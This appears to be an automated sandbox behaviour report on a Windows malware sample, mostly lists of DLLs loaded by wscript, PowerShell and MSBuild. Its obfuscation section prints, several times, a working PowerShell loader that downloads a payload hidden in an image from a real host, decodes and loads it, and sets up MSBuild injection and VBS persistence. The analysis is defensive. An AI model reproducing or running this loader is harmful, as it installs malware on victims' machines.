                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell.exe -Command "$noninterest = 'https://res.cloudinary.com/dzvai8", "0", "false");
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02C9F6D8 push esp; iretd 15_2_02C9F6D9

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\talpe.vbsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
